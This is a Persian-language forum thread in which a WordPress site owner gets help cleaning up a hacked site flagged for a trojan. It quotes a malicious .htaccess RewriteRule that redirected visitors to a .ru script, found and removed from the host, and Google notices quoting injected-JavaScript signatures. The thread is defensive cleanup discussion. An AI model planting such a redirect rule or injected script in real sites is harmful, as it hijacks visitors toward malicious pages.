تروجان

[pichgooshti 23]

به پشتیبانی هاست گفتم، فایل ها را اسکن کردن و فقط یک فایل آلوده پیدا کردن و پاکش کردن. ویروس یاب به افزونه page navi گیر میداد، اون را با موبایل پاکش کردم(با کامپیوتر اصلا نمیشه وارد شد) ولی باز هم مرورگر و ویروس یاب اخطار میدن و نمیشه وارد شد... میشه مشخصات را بدم یه نفر بیاد یه نگاه بندازه؟

[Saeed Fard 4740]

یعنی میفرمایید کل اطلاعاتش (یعنی بیش از 1000 تا پست) هم باید پاک بشه؟

نه خير اصلا ، با كاري كه من گفتم شما داريد كل فايل‌هاي هاستتون ( به غير از فايل‌هايي كه در نصب وردپرس بعدي لازم داريد ) رو پاك ميكنيد ، مطالب شما در ديتابيس هستند ،

بهتره كاري كه گفتم رو به هاستتون بگيد كه انجام بدند ، يعني به غير از فولدر themes و uploads كه در wp-content هستند و همچنين فايل wp-config.php ، تمامي چيز‌ها رو پاك كنند ، اگه مشكل رفع شده باشه تقريبا 1 تا 2 روز طول ميكشه تا از اين حالت در بياد ، بعد ميتونيد از نو وردپرس رو نصب كنيد .. ( حتما بگيد كه فرمت نكنند و فقط فايل‌ها رو پاك كنند كه ديتابيس حذف نشه )

[pichgooshti 23]

ممنون.

شما فرمودین فولدر تمز هم سرجاش باشه. یعنی کدهای قالبم هیچ مشکلی نداره؟

[Saeed Fard 4740]

در هر صورت شما بايد متوجه بشيد كه مشكل از كدوم قسمت هست ، ممكنه مشكل از هر جايي باشه يا هر جايي آلوده باشه ، حتي خود ديتابيس .. با اين‌كار شما خيالتون از خود هاست مطمئن ميشه و به نوعي آزمون و خطا هستش ، اگه مشكل از ساير فايل‌ها باشه رفع ميشه و اگه از قالب يا ديتابيس باشه نه ، اگه رفع نشد بايد به ساير قسمت‌ها پرداخته بشه ..

[pichgooshti 23]

سلام مجدد

ممنون بابت راهنماییتون.

من همه فایل ها را پاک کردم. تا چند روز دیگه هم اصلا وقت نمیکنم وردپرس را نصب کنم. راستی پلاگین ها را هم باید پاک کنم؟ پلاگینی مثل SEO PACK اگه پاک بشه که خیلی بد میشه!!! نمیشه؟

فقط یه سوال مونده، اینکه چرا مرورگر برای صفحه سی پنل هم اخطار میده؟ مگه اونم آلودس؟!!!

راستی یه چیزی... این هاست درپیت فعلی داره نفس های آخر را میکشه. تقریبا دو سه هفته دیگه تمامه. هاست را که 100% عوض میکنم. ولی به نظر شما بهتر نیست کل اطلاعات (بدون فایل های وردپرس که الان پاکشون کردم) منتقل بشن به یک هاست جدید و اونجا ادامه ی عملیات نصب و پاک سازی را انجام بدیم؟؟

ویرایش شده تیر 91 توسط pichgooshti

[Saeed Fard 4740]

دوست عزيز ، واسه‌ي شما فعلا مهم‌ترين چيز در اومدن دامنه‌ي سايتتون از بلاك هستش + مطالب سايتتون ، يعني پلاگين‌ها اصلا مهم نيست و حتما بايد پاك بشوند ، ممكنه مشكل از پلاگين‌ها باشه كه احتمالش هم زياده ، ( هر نوع پلاگيني رو بعدا ميتونيد تنظيم و درستش كنيد ) ، وقتي اين مدت طولاني هستش كه سايت شما بلاكه ، ديگه پلاگين Seo Pack به چه درد شما ميخوره و اصلا سئو سايتتون مفهومي نداره ..

بهتره سعي كنيد تا اين يكي 2 هفته سايتتون رو از بلاك در بياريد و بعد محتوايات سالم سايتتون رو به سرور جديد انتقال بديد ..

موفق باشيد ../.

[pichgooshti 23]

سلام

پشتیبانی هاستم، به قول خودشون سرویس من را ریست کردن ولی بی فایده بود. البته این کاملا مشخص بود، مث اینه که اطلاعات را بردارن و دوباره بذارن سرجاش

فعلا من همون کاری که شما گفتید را کردم. یعنی افرزونه ها و تمام فایل های وردپرس را پاک کردم تا یکی دو روز دیگه وردپرس را روش نصب کنم. فقط نمیدونم چرا با وجود پاک کردن اطلاعات وردپرس و افزونه ها، گوگل باز هم گیر میده

یک هفته پیش این اخطار را میداد:

Notice of Suspected Hacking on http://www.pichgooshti.com/

Dear site owner or webmaster of http://www.pichgooshti.com/,

We are writing to let you know that we believe some of your website's pages may be hacked. Specifically, we think that JavaScript has been injected into your site by a third party and may be used to redirect users to malicious sites. You should check your source code for any unfamiliar JavaScript and in particular any files containing "i=0;try{prototype;}catch(z)". The malicious code may be placed in HTML, JavaScript or PHP files so it's important to be thorough in your search.

The following are example URLs from your site where we found such content:

.....

...

ولی حالا این اخطار را میده:

Google couldn't access your site because of a server connectivity issue.

اخطار دوم به خاطر عدم دسترسی به سایته؟ با خاطر آلوده بودن و این حرفا که نیست؟!

[Morteza 34190]

مشکل در اتصال به سرور شماست.

به آلودگی مربوط نیست.

[Saeed Fard 4740]

دوست عزيز به سلامتي سايتتون از بلك ليست گوگل در اومده و مشكل بد افزار رفع شده ،، حالا بهتره هر چه زودتر سايتتون رو بالا بياريد ..

موفق باشيد ../.

[pichgooshti 23]

سلام

فایل های وردپرس را مجددا بارگذاری کردم، باز هم مرورگر و ویروس یاب به تروجان گیر دادن.

حالا مشکل را از کجا پیگیری کنم؟

[Morteza 34190]

سایتتون الان بالا هست؟

چیزی لود نمیشه.

[pichgooshti 23]

سایتتون الان بالا هست؟

چیزی لود نمیشه.

سلام

من قالب ها را کلا حذف کردم (رو سیستمم دارم) و قالب فابریک وردپرس را نصب کردم مجددا. الان دیگه مشکلی نیست. میشه یه نگاه بندازید؟

الان تمامه؟

میتونم افزونه ها را مجددا نصب کنم؟

قالب چی؟ قالب قبلیم یعنی مشکل داشته؟ چطور باید مشکلش را رفع کنم تا دوباره نصبش کنم؟

[Saeed Fard 4740]

بله دوست عزيز الان سايتتون از اسپم در اومده و مرورگر بلاك نميكنه و نمايش داده ميشه ..

بعيد ميدونم مشكل از قالب باشه .. شما وردپرس رو نصب كنيد ، و به ترتيب افزونه‌ها رو نصب و فعال كنيد ، افزونه‌هاي معتبر و آشنا رو از خود مخزن دانلود و نصب كنيد ، بهتره كد‌هاي قالبتون رو توي كامپيوترتون نگاه كنيد تا اسكريپت يا كد مشكوكي درونش نباشه ، بعد نصبش كنيد ..

[pichgooshti 23]

سلام

ببخشید الان اگه وارد سایت بشید، مرورگر اخطار امنیتی نمیده. ولی اگه توی گوگل سایتم را سرچ کنید، دیگه مثل قبل زیر سایتم نمینویسه که "این وبسایت ممکن است به کامپیوترتان آسیب برساند" ولی وقتی روی لینک وبسایتم کلیک میکنم، مرورگر اخطار امنیتی میده. من که نفهمیدم بالاخره مشکل حل شده یا نه؟ اگه حل شده چرا گوگل اینجوری لینک سایتم را میده؟

[Morteza 34190]

هنوز به عنوان سایت خطرناک میشناسه و علت هم ریدایرکت به سایت http://hecrery.ru/count11.php هست.

[pichgooshti 23]

هنوز به عنوان سایت خطرناک میشناسه و علت هم ریدایرکت به سایت http://hecrery.ru/count11.php هست.

چرا این اتفاق میفته؟ چطور حلش کنم؟

[Morteza 34190]

یا اینکه سرور شما آلوده هست.

یا اینکه در یک فایل این آلودگی وجود داره.

یا ممکن هم هست شل توی سرور شما باشه.

آدرس سایتی که دادم رو با توضیحات به مدیر سرور تیکت کنید تا سرور شما رو اسکن کنه.

[pichgooshti 23]

یا اینکه سرور شما آلوده هست.

یا اینکه در یک فایل این آلودگی وجود داره.

یا ممکن هم هست شل توی سرور شما باشه.

آدرس سایتی که دادم رو با توضیحات به مدیر سرور تیکت کنید تا سرور شما رو اسکن کنه.

سلام

مشکلی عجیبیه.

اگه شما برای اولین بار بخواید مستقیما وارد سایت من بشید، بدون هیچ مشکلی وارد میشید ولی اگه از طریق موتورهای جست و جوگر بخواید وارد بشید، ریدایرکت میشید توی اون سایت آلوده و بعد از اون هم چون وبسایتم توی کش مرورگر ذخیره شده، اگه مجددا وارد بشید ریدایرکت میشید توی اون وبسایته.

حتی با وردپرس های جدیدی که توی زیردامنه ها میسازم هم همین اتفاق میفته.

ویرایش شده تیر 91 توسط pichgooshti

[Saeed Fard 4740]

رسول جان مشكل از وردپرس نصب شده نيستش ، مشكل به آلودگي سرور برميگرده ،،

كاري كه آقا مرتضي توي پست قبلي گفتند رو انجام داديد ؟

[pichgooshti 23]

كد

RewriteRule ^(.*)$ http://hecrery.ru/count11.php [R=301,L]

داخل htaccess هاست قرار داشت.

حذف شد. امیدوارم مشکل برای همیشه حل شده باشه

[Saeed Fard 4740]

بله ، مشكل حل شده و ديگه از نتايج جستجو دايركت نميشه و سايت خودتون باز ميشه ..

موفق باشيد ../.

[pichgooshti 23]

سلام

باز گوگل میگه سایتت هک شده و این پیغام را میده:

Notice of Suspected Hacking on http://www.pichgooshti.com/

July 3, 2012

Dear site owner or webmaster of http://www.pichgooshti.com/,

We are writing to let you know that we believe some of your website's pages may be hacked. Specifically, we think that JavaScript has been injected into your site by a third party and may be used to redirect users to malicious sites. You should check your source code for any unfamiliar JavaScript and in particular any files containing "i=0;try{avasv=prototype;}catch(z){h="harCode"". The malicious code may be placed in HTML, JavaScript or PHP files so it's important to be thorough in your search.

The following are example URLs from your site where we found such content:

http://www.pichgooshti.com/1389/10/%D8%B3%D8%A7%D8%AE%D8%AA-%D8%B1%D8%A7%D9%87-%D8%A2%D9%87%D9%86-%D9%BE%D8%B1%D8%B3%D8%B1%D8%B9%D8%AA-%D8%AF%D8%B1-%D8%B1%D9%88%D8%B3%D9%8A%D9%87-%D8%A8%D8%B1%D8%A7%D9%8A-%D8%AC%D8%A7%D9%85-%D8%AC%D9-2/

http://www.pichgooshti.com/1390/08/pichgooshti-best-week-pics-aban-7-13/

http://www.pichgooshti.com/tag/%D8%B7%D8%B1%D8%A7%D8%AD%DB%8C/

In addition, it's also possible your server configuration files (such as Apache's .htaccess) have been compromised. As a result of this, your site may be cloaking and showing the malicious content only in certain situations.

We encourage you to investigate this matter in order to protect your visitors. If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but also to identify and fix the vulnerability. A good first step may be to contact your web host's technical support for assistance. It's also important to make sure that your website's software is up-to-date with the latest security updates and patches.

More information about cleaning your site can be found at:

http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163634

Sincerely, Google Search Quality Team

از طرف هاستینگ گفتن که:

با سلام

يكي از پلاگين يا قالبهاي شما تروجان دارد

that JavaScript has been injected into your site by a third party and may be used to redirect users to malicious sites. You should check your source code for any unfamiliar JavaScript and in particular any files containing "i=0;try{avasv=prototype;}catch(z){h="harCode"". The malicious code may be placed in HTML, JavaScript or PHP files so it's important to be thorough in your search.

به احتمال زياد مشكل از سمت پلاگين contact from 7 است

بالكل از هاست پاكش كنيد

راست میگن؟ آخه افزونه به این مهمی را که نمیتونم پاک کنم! چکار کنم؟

[Morteza 34190]

خوب دستی حذف کنید بعد دوباره اپلود کنید.